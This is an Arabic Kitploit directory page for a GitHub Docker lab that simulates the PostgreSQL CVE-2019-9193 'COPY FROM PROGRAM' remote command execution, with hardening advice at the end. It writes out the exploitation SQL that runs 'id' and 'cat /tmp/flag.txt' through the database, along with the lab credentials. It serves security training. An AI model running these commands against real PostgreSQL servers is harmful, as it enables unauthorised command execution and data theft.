Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/netw0rk7/cve-2019-9193-home-lab
تحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالتعلم والتعليمأمن قواعد البياناتمختبرات وتدريب عملي
GitHubnetw0rk7/cve-2019-9193-home-lab

CVE-2019-9193-Home-Lab

يُحاكي هذا المختبر CVE-2019-9193 - PostgreSQL COPY FROM PROGRAM RCE

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

CVE20199193-2

يحاكي هذا المختبر الثغرة CVE-2019-9193 التي حدثت في PostgreSQL الإصدار 9.3 - 11.2، والتي تتيح للمستخدم الذي يتمتع بصلاحيات superuser أو دور pg_execute_server_program استخدام الأمر:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

لتشغيل أوامر نظام التشغيل مباشرة، مما يؤدي إلى تنفيذ الأوامر عن بُعد (RCE) إذا تمكن المهاجم من الوصول إلى قاعدة البيانات.

هذا المختبر يسمح لك باستخدام هذه الإمكانية لقراءة الملف:

root@kitploit:~
/tmp/flag.txt

أهداف المختبر

  1. الاتصال بـ PostgreSQL باستخدام:
    • المستخدم: postgres
    • كلمة المرور: sentinel7
    • المنفذ: 5433
  2. استخدام COPY FROM PROGRAM لتشغيل أوامر نظام التشغيل
  3. قراءة العلامة من /tmp/flag.txt

البدء

root@kitploit:~
docker compose build
docker compose up -d

ثم الاتصال بقاعدة البيانات:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

خطوات الهجوم

1) إنشاء جدول لتخزين المخرجات

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) اختبار RCE بأمر id

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) قراءة العلامة

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

مثال على المخرجات:

root@kitploit:~
flag{SECRET}

توصيات أمنية

  • لا تستخدم المستخدم postgres مع التطبيقات الحقيقية
  • قَيّد الأدوار بحيث لا تحتوي على pg_execute_server_program
  • عطّل أو قَيّد استخدام COPY PROGRAM
  • حصّن التطبيقات ضد SQLi في جميع الأنظمة

النسخة الإنجليزية

CVE-2019-9193 — PostgreSQL COPY FROM PROGRAM RCE

يحاكي هذا المختبر CVE-2019-9193، وهي ثغرة في PostgreSQL الإصدار 9.3–11.2 تسمح باستخدام:

root@kitploit:~
COPY ... FROM PROGRAM '<command>'

لتنفيذ أوامر نظام التشغيل عند تشغيلها بواسطة مستخدم superuser أو دور يحتوي على pg_execute_server_program.

مهمتك هي استغلال هذه الميزة لقراءة:

root@kitploit:~
/tmp/flag.txt

الهدف

  1. الاتصال بـ PostgreSQL:
    • المستخدم: postgres
    • كلمة المرور: sentinel7
    • منفذ المضيف: 5433
  2. استخدام COPY FROM PROGRAM لـ:
    • تنفيذ أوامر نظام التشغيل
    • استرجاع العلامة

البدء

root@kitploit:~
docker compose build
docker compose up -d

الاتصال عبر:

root@kitploit:~
psql -U postgres -h 127.0.0.1 -p 5433

الاستغلال

1) إنشاء جدول

root@kitploit:~
CREATE TABLE cmd_exec(cmd_output text);

2) اختبار RCE

root@kitploit:~
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

3) قراءة العلامة

root@kitploit:~
TRUNCATE cmd_exec;
COPY cmd_exec FROM PROGRAM 'cat /tmp/flag.txt';
SELECT * FROM cmd_exec;

ملاحظات أمنية

  • لا تقم أبداً بتشغيل التطبيقات باستخدام superuser الخاص بـ PostgreSQL
  • لا تمنح صلاحية pg_execute_server_program دون داعٍ
  • عطّل أو قَيّد استخدام COPY PROGRAM
  • حصّن التطبيقات ضد حقن SQL
تنزيل الأداة